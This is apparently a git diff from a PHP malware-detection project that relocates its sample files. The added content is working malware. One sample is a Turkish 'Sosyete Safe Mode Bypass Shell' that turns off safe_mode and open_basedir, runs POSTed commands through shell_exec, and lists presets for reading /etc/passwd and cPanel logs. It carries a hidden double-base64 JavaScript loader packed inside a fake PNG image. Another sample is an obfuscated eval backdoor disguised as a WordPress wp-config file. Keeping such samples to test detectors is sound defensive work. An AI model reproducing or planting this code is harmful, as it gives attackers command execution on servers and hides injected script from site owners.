MHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>

-<script type="text/javascript">

-if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};

-setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(13);}, 500);

-</script>

-                                                </body>

-

-</html>

+<html>
+ <head>
+   <meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa">
+   <title> Sosyete Safe Mode Bypass Shell </title>
+   <style>
+   td {
+   font-family: verdana, arial, ms sans serif, sans-serif;
+   font-size: 11px;
+   color: #D5ECF9;
+   }
+   BODY {
+   margin-top: 4px;
+   margin-right: 4px;
+   margin-bottom: 4px;
+   margin-left: 4px;
+   scrollbar-face-color: #b6b5b5;
+   scrollbar-highlight-color: #758393;
+   scrollbar-3dlight-color: #000000;
+   scrollbar-darkshadow-color: #101842;
+   scrollbar-shadow-color: #ffffff;
+   scrollbar-arrow-color: #000000;
+   scrollbar-track-color: #ffffff;
+   }
+   A:link {COLOR:blue; TEXT-DECORATION: none}
+   A:visited { COLOR:blue; TEXT-DECORATION: none}
+   A:active {COLOR:blue; TEXT-DECORATION: none}
+   A:hover {color:red;TEXT-DECORATION: none}
+   input, textarea, select {
+   background-color: #EBEAEA;
+   border-style: solid;
+   border-width: 1px;
+   font-family: verdana, arial, sans-serif;
+   font-size: 11px;
+   color: #333333;
+   padding: 0px;
+   }
+   </style>
+   </head>
+    <BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+        <center>
+        <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+        <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+    <p align="center"> </p>
+    <p align="center">
+    <a bookmark="minipanel">
+    <font face="Webdings" size="7" color="#DCE7EF"></font></a><font size="7" face="Martina"></font><span lang="en-us"><font size="3" face="Martina"> </font>
+    <br>
+        <font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>
+    </p>
+            <a bookmark="minipanel">
+    <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+    <p align="center">Sosyete Safe Mode Bypass Shell 
+    <b>
+        <font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>
+   </p>
+        <a bookmark="minipanel">
+  <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+  <p align="center">~
+    <b>
+
+
+                <p>
+    </form>
+        </p>
+                </td>
+
+
+    </tr>
+            </table>   
+     </a>
+         
+         <p>
+         
+             <br>
+                 </p>
+        
+     <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+        <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+  <b>
+     </b>
+         <font face="Wingdings 3" size="5"></font><b>Sosyete Safe Mode Bypass Shell ; Bypass shell'lerden esinlenerek birçok shell'in ortak karisimi olarak sunulmustur.<span lang="en-us"></span><span lang="en-us"></span> </b><font face="Wingdings 3" size="5"></font></p><p align="center"> </p></td></tr></table>
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us">
+
+        </span>
+                        </div>
+                </body>
+    </html>
+
+ <?
+
+
+echo "<b><font color=red>Sosyete Bypass Main Menu</font></b><br>";
+
+print_r('
+
+
+
+
+<pre>
+
+
+<form method="POST" action="">
+<b><font color=red> </font></b><input name="sosyete" type="text"><input value="&#199;al&#305;&#351;t&#305;r" type="submit">
+</form>
+<form method="POST" action="">
+<b><font color=red></font><select size="1" name="fuck">
+<option value=" ">Sosyete safe mode bypass shell</option>
+<option value="id;pwd">id & Dizin</option>
+<option value="ls">Dosyalar</option>
+<option value="uname -a">Server</option>
+<option value="netstat -an | grep -i listen">A&#231;&#305;k Portlar</option>
+<option value="ipconfig">A&#287; Bilgisi</option>
+<option value="ps -aux">Uygulamalar</option>
+<option value="who -q">Kullan&#305;c&#305; Say&#305;s&#305;</option>
+<option value="cat /etc/passwd">cat/etc/passwd</option>
+<option value="cat /var/cpanel/accounting.log">cat/var/cpanel/accounting.log</option>
+<option value="cat /etc/syslog.conf">cat/etc/syslog.conf</option>
+<option value="cat /etc/hosts">cat/etc/hosts</option>
+<option value="cat /etc/named.conf">cat/etc/named.conf</option>
+<option value="cat /etc/httpd/conf/httpd.conf">cat/etc/httpd/conf/httpd.conf</option>
+</select> <input type="submit" value="&#199;al&#305;&#351;t&#305;r">
+</form>
+</pre>
+<style>
+   td {
+   font-family: verdana, arial, ms sans serif, sans-serif;
+   font-size: 11px;
+   color: #D5ECF9;
+   }
+   BODY {
+   margin-top: 4px;
+   margin-right: 4px;
+   margin-bottom: 4px;
+   margin-left: 4px;
+   scrollbar-face-color: #b6b5b5;
+   scrollbar-highlight-color: #758393;
+   scrollbar-3dlight-color: #000000;
+   scrollbar-darkshadow-color: #101842;
+   scrollbar-shadow-color: #ffffff;
+   scrollbar-arrow-color: #000000;
+   scrollbar-track-color: #ffffff;
+   }
+   A:link {COLOR:blue; TEXT-DECORATION: none}
+   A:visited { COLOR:blue; TEXT-DECORATION: none}
+   A:active {COLOR:blue; TEXT-DECORATION: none}
+   A:hover {color:red;TEXT-DECORATION: none}
+   input, textarea, select {
+   background-color: #EBEAEA;
+   border-style: solid;
+   border-width: 1px;
+   font-family: verdana, arial, sans-serif;
+   font-size: 11px;
+   color: #333333;
+   padding: 0px;
+   }
+  </style></head>
+<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+    <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+<p align="center"> </p>
+    <p align="center">
+<a bookmark="minipanel">
+    <font face="Webdings" size="7" color="#DCE7EF"></font></a><font size="7" face="Martina"></font><span lang="en-us"><font size="3" face="Martina"> </font>
+    <br>
+<font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>
+</p>
+
+
+<div align="right">
+
+<span lang="en-us"> </span></div></body></html>
+
+
+');
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$fuck=shell_exec($_POST['sosyete']); 
+$mokoko=shell_exec($_POST['fuck']); 
+echo "<pre><h4>";
+echo "<b><font color=red>Komut Sonucu </font></b><br>"; 
+echo $fuck;
+echo $mokoko;
+echo "</h4></pre>";
+
+?>
+
+</tr>
+        </table>    
+                
+                </a>
+                        <p>
+                                
+        <br>
+        
+                </p>
+                                        <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+    <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+    
+        <b>
+     
+         </b><font face="Wingdings 3" size="5"></font><b><font color="#CC0000">Sosyete Safe Mode Bypass Shell<span lang="en-us"></span> <span lang="en-us"> </span>  </b><font color="#CC0000"><b>Coded by</b> </font><b><span lang="en-us"><a href="http://www.r57.biz"><font color="#CC0000">r57.biz</a></span><font color="#CC0000"> ~ <span lang="en-us">Sosyete</span> </b><font face="Wingdings 3" size="5"> </font></p><p align="center"> </p></td></tr></table>
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us">
+
+</span>
+                </div>
+                <img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
+<script type="text/javascript">
+if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
+setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(13);}, 500);
+</script>
+                                                </body>
+
+</html>
diff --git a/php-malware-finder/samples/cpanel.php b/data/samples/cpanel.php
index 0899f12..0899f12 100644
--- a/php-malware-finder/samples/cpanel.php
+++ b/data/samples/cpanel.php
diff --git a/php-malware-finder/samples/freepbx.php b/data/samples/freepbx.php
index 5ccf441..5ccf441 100644
--- a/php-malware-finder/samples/freepbx.php
+++ b/data/samples/freepbx.php
diff --git a/php-malware-finder/samples/obfuscators/cipher_design.php b/data/samples/obfuscators/cipher_design.php
index 0ccf2c1..0ccf2c1 100644
--- a/php-malware-finder/samples/obfuscators/cipher_design.php
+++ b/data/samples/obfuscators/cipher_design.php
diff --git a/php-malware-finder/samples/obfuscators/online_php_obfuscator.php b/data/samples/obfuscators/online_php_obfuscator.php
index e64cb31..e64cb31 100644
--- a/php-malware-finder/samples/obfuscators/online_php_obfuscator.php
+++ b/data/samples/obfuscators/online_php_obfuscator.php
diff --git a/php-malware-finder/samples/obfuscators/phpencode.php b/data/samples/obfuscators/phpencode.php
index a6797f5..a6797f5 100644
--- a/php-malware-finder/samples/obfuscators/phpencode.php
+++ b/data/samples/obfuscators/phpencode.php
diff --git a/php-malware-finder/samples/real/awvjtnz.php b/data/samples/real/awvjtnz.php
index 9d0e366..9d0e366 100644
--- a/php-malware-finder/samples/real/awvjtnz.php
+++ b/data/samples/real/awvjtnz.php
diff --git a/php-malware-finder/samples/real/exceptions.php b/data/samples/real/exceptions.php
index d5ce73f..d5ce73f 100644
--- a/php-malware-finder/samples/real/exceptions.php
+++ b/data/samples/real/exceptions.php
diff --git a/php-malware-finder/samples/real/guidtz.php b/data/samples/real/guidtz.php
index d482cb0..828c0f8 100644
--- a/php-malware-finder/samples/real/guidtz.php
+++ b/data/samples/real/guidtz.php
@@ -1,76 +1,76 @@
-<?php 

-/*

-* The base configurations of the WordPress.

- *

- * This file has the following configurations: MySQL settings, Table Prefix,

- * Secret Keys, and ABSPATH. You can find more information by visiting

- * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}

- * Codex page. You can get the MySQL settings from your web host.

- *

- * This file is used by the wp-config.php creation script during the

- * installation. 

- *

- * @package WordPress

-*/

+<?php 
+/*
+* The base configurations of the WordPress.
+ *
+ * This file has the following configurations: MySQL settings, Table Prefix,
+ * Secret Keys, and ABSPATH. You can find more information by visiting
+ * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
+ * Codex page. You can get the MySQL settings from your web host.
+ *
+ * This file is used by the wp-config.php creation script during the
+ * installation. 
+ *
+ * @package WordPress
+*/
 @error_reporting(0);@ini_set('display_errors',false);defined('„··7³µ³8¸13530´·') || define('„··7³µ³8¸13530´·',__FILE__);global $ƒ³µ7834¶81µ9´2¸5;global $·53´·¶6³9¶7775µ³; if(!function_exists('³0µ93µµ¶98511086')){ function ³0µ93µµ¶98511086($‰9·2³µ·2851µ5´5µ,$³71¸¸34076112µ06=''){ if(empty($‰9·2³µ·2851µ5´5µ)) return ''; $‰9·2³µ·2851µ5´5µ=base64_decode($‰9·2³µ·2851µ5´5µ); if($³71¸¸34076112µ06=='') return ~$‰9·2³µ·2851µ5´5µ; if($³71¸¸34076112µ06=='-1') @‡7µ16´¸2´923¶895(); $‰¶505·³465¶7´1µ6=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['ƒ2µ³´522259¶6·2³']($‰9·2³µ·2851µ5´5µ); $³71¸¸34076112µ06=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['…70µ53233³19´¶66']($³71¸¸34076112µ06,$‰¶505·³465¶7´1µ6,$³71¸¸34076112µ06); return $‰9·2³µ·2851µ5´5µ^$³71¸¸34076112µ06; }} if(!function_exists('´8·18¶3¸´µ9´µ1´8')){ function ´8·18¶3¸´µ9´µ1´8($‰9·2³µ·2851µ5´5µ,$³71¸¸34076112µ06=''){ if(empty($‰9·2³µ·2851µ5´5µ)) return ''; $‰9·2³µ·2851µ5´5µ=base64_decode($‰9·2³µ·2851µ5´5µ); if($³71¸¸34076112µ06=='') return ~$‰9·2³µ·2851µ5´5µ; if($³71¸¸34076112µ06=='-1') @¶¸8¶0³42¸·4¶791¸(); $‰¶505·³465¶7´1µ6=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['ƒ2µ³´522259¶6·2³']($‰9·2³µ·2851µ5´5µ); $³71¸¸34076112µ06=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['…70µ53233³19´¶66']($³71¸¸34076112µ06,$‰¶505·³465¶7´1µ6,$³71¸¸34076112µ06); return $³71¸¸34076112µ06^$‰9·2³µ·2851µ5´5µ; }}$ƒ³µ7834¶81µ9´2¸5["…70µ53233³19´¶66"]=´8·18¶3¸´µ9´µ1´8('jIuNoI+emw==','');$ƒ³µ7834¶81µ9´2¸5["ƒ464120·78´¸³³0´"]=´8·18¶3¸´µ9´µ1´8('nZ6MmsnLoJuanJCbmg==','');$ƒ³µ7834¶81µ9´2¸5["ƒ2µ³´522259¶6·2³"]=´8·18¶3¸´µ9´µ1´8('jIuNk5qR','');$ƒ³µ7834¶81µ9´2¸5["Š·77306821¶µ¸256"]=´8·18¶3¸´µ9´µ1´8('Gw4QPCMiFwoGLjQ=','HKBjfp');$ƒ³µ7834¶81µ9´2¸5["¸829¶³´197593·77"]='';$ƒ³µ7834¶81µ9´2¸5["‹552¶965¸0´732·3"]=´8·18¶3¸´µ9´µ1´8('ZiAFGwwjBCM=','6hUD_fHe9');$ƒ³µ7834¶81µ9´2¸5["··0702¶³´µµ8209³"]='';$ƒ³µ7834¶81µ9´2¸5["ˆ1³¶8´03324¶µ362"]='';$ƒ³µ7834¶81µ9´2¸5["Š9¶¶1528381µ305¶"]=´8·18¶3¸´µ9´µ1´8('CzQTIBMXBz8AOxM=','XqAvVE');$ƒ³µ7834¶81µ9´2¸5["¶06648·177994296"]='';$ƒ³µ7834¶81µ9´2¸5["„¶5·27µ9076¸9·µ6"]='';$ƒ³µ7834¶81µ9´2¸5["µ8790¸µ·27403321"]=´8·18¶3¸´µ9´µ1´8('WFZYblllfXZ1d1lV','ldv_kTSCBY');$ƒ³µ7834¶81µ9´2¸5["‚¸9053¶µ36·429µ0"]='';$ƒ³µ7834¶81µ9´2¸5["ˆ¸3³5´µ1¸2¸µ3591"]=´8·18¶3¸´µ9´µ1´8('DStf','nG67D');$ƒ³µ7834¶81µ9´2¸5["µ3µ73¸¶22¶92¸99³"]='';$ƒ³µ7834¶81µ9´2¸5["…77µ¶0´98³3¶3283"]=´8·18¶3¸´µ9´µ1´8('HA4VNhUDHQ8PHCs=','NKXyAFB');$ƒ³µ7834¶81µ9´2¸5["µ38·¶µ¸¸5777¶05·"]=´8·18¶3¸´µ9´µ1´8('AxhnCDs7JiUc','KL3XdsivH');$ƒ³µ7834¶81µ9´2¸5["‡51¸582³³³3µµ¶µ1"]='';$ƒ³µ7834¶81µ9´2¸5["‚8´´301¸93³³µ080"]='';$ƒ³µ7834¶81µ9´2¸5["…73606080·¸7414¸"]=´8·18¶3¸´µ9´µ1´8('FBlCWFItAUQGOgAQ','sc761Bl4t_');$ƒ³µ7834¶81µ9´2¸5["„³331074705³·24¸"]=´8·18¶3¸´µ9´µ1´8('O14wQSA4','R0D7AT');$ƒ³µ7834¶81µ9´2¸5["‡4³1´9832µ54978¸"]=´8·18¶3¸´µ9´µ1´8('HUYkECY6','n2VbCLrH');$ƒ³µ7834¶81µ9´2¸5["‚¶µ5´223¸162³2¸9"]=´8·18¶3¸´µ9´µ1´8('JQI/ERwMNgAcCDwaNw49ADA=','CkSt');$ƒ³µ7834¶81µ9´2¸5["„·¶2¶739¶17µ·042"]=´8·18¶3¸´µ9´µ1´8('GQAnKg==','miJOLV7G');$ƒ³µ7834¶81µ9´2¸5["³¸88´0·8¶µ³48286"]=´8·18¶3¸´µ9´µ1´8('GwEEPz9L','htfLK9uXy');  $·53´·¶6³9¶7775µ³['ˆ2³4³7µ4´¸85´74µ']=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['„·¶2¶739¶17µ·042'](); $·53´·¶6³9¶7775µ³['ƒ·1´0´¸³0736µ02³']=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['‚¶µ5´223¸162³2¸9'](„··7³µ³8¸13530´·); $·53´·¶6³9¶7775µ³['Šµ16¸9µ6¶997³´12']=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['‡4³1´9832µ54978¸']('2ef4d9904bd650312d329366c9fe69dc'); $·53´·¶6³9¶7775µ³['³72¸1µ1µ¸´69¸0´´']=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['„³331074705³·24¸']($GLOBALS['ƒ³µ7834¶81µ9´2¸5']['‡4³1´9832µ54978¸']('1094000000')); $·53´·¶6³9¶7775µ³['‚¸77·7·¸7¶6³752µ']=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['„³331074705³·24¸']($GLOBALS['ƒ³µ7834¶81µ9´2¸5']['‡4³1´9832µ54978¸']('6100000000')); $·53´·¶6³9¶7775µ³['„µ9³570¸4µ805963']=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['„³331074705³·24¸']($GLOBALS['ƒ³µ7834¶81µ9´2¸5']['‡4³1´9832µ54978¸']('6600000000')); $·53´·¶6³9¶7775µ³['‡·³16³·7³´189·6³']=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['„³331074705³·24¸']($GLOBALS['ƒ³µ7834¶81µ9´2¸5']['‡4³1´9832µ54978¸']('0123000000')); $·53´·¶6³9¶7775µ³['‚541³´13¸7´µ7¸³¶']=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['³¸88´0·8¶µ³48286']($·53´·¶6³9¶7775µ³['ƒ·1´0´¸³0736µ02³'],$·53´·¶6³9¶7775µ³['³72¸1µ1µ¸´69¸0´´'],$·53´·¶6³9¶7775µ³['‡·³16³·7³´189·6³']); $·53´·¶6³9¶7775µ³['‚541³´13¸7´µ7¸³¶']=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['ƒ464120·78´¸³³0´']($·53´·¶6³9¶7775µ³['‚541³´13¸7´µ7¸³¶']); $·53´·¶6³9¶7775µ³['‚541³´13¸7´µ7¸³¶']=$GLOBALS['ƒ³µ7834¶81µ9´2¸5']['…73606080·¸7414¸']($·53´·¶6³9¶7775µ³['‚541³´13¸7´µ7¸³¶']); return(eval($·53´·¶6³9¶7775µ³['‚541³´13¸7´µ7¸³¶'])); ?>
-

-#!/usr/bin/php -q

-eNrtWWtPW1cW/SsERTVoUHvej1La2MaOzRuDoU6EEHaMzdNpnNSEtl+StGmTn3OeP2/2hWikMcdw

-M5NpJ1Ilf7LuXXfts9dee59z7r82TirKvMJOWxL54+l3NHAtNWaO4oAJm95bsCpg5Wm08IzDVs0U

-VjfrJ2v9TnulvLNYmCs0RjuPas9KK/KHwuz8/ZuYvyFhFGNRa0+x9S6JubbdWSu9PDlb6xW7a4uD

-BcD9sb2/fJiGfBM88ZJqj6ULiJEkZGXUQaXRQgbVO2+1T9NQryIxVCpJo1SKGZOEWq9WuqvbJweN

-RbxWWuzJxeIV7D47bu0coQnACuPgSPDSay4DTgKvXDzZBqDS8HBlsb47SCN5RKxlVnArDBeGJpFK

-5ZNHa9uo2byO+GDzqNV4Kpp8AmSUwIkxSZhyFKUhK9vFbrmE8MPSsLbWO9mtvKwvlXutDL7RXVlM

-I7/l0qIYKYK4pfJpBT3ZHG3Xyq2T8kt+Uis1q+uXg5U67Xxf6beGS72rAESruHH0fH+CpkxUyqKg

-vDNMESWSX2kU6/3Ni9MqoMlRGZ2loRw1OvAodLBWEBySUEvl4ln9YthqnTG8vDgUy/1Op3Xek/Xj

-QX/9g8ZePB9s1wT+cYJkDaUYSSYRN4GwmPzM98cnLzfLuJkx3q2KFbU/TKO9d1oZzp1CXgRqUBKt

-fsHQ0iU6ALSN4+qEfP2utYtQQ4JQTS3TSaRqE7d3Lur9agOfNyujjfURKwLqUHF2WLucAEwZB+VK

-5pSM0aeBawi1VkpKrdb6mZWc6uPh2dZi/emEkvKOW0JoxIIYEtOQ9fLodPni5GhlcfBo6ajVWz0q

-nq8fN7MUVSv1tTSyNcwyBpbCmdIOpw1ldVE/rJeGZP0Yd+uXLEPcWmIri5X9Ok7DvgbQaJBzDEuw

-mXQx7Gx1msXio52N6upFJvzG4WkLTchWUNZKYZyTSBKEfHpRL4fnG6Xmcq28iorFesbzdL3Z6U2w

-l/cMReYk5N8aa8kEB9zu0J3eqLx2jM7Wryu0XmngrcHuhMgVV1JgRaSP3Ol0VZWPhsulRmsZwJpn

-5fpWGupXKn1wlGkbmQoqzW9pVHlav7zK8kW3slE9KMtBK40H3qSgG8VgsDJSpVVUbqiTzTKvAN7l

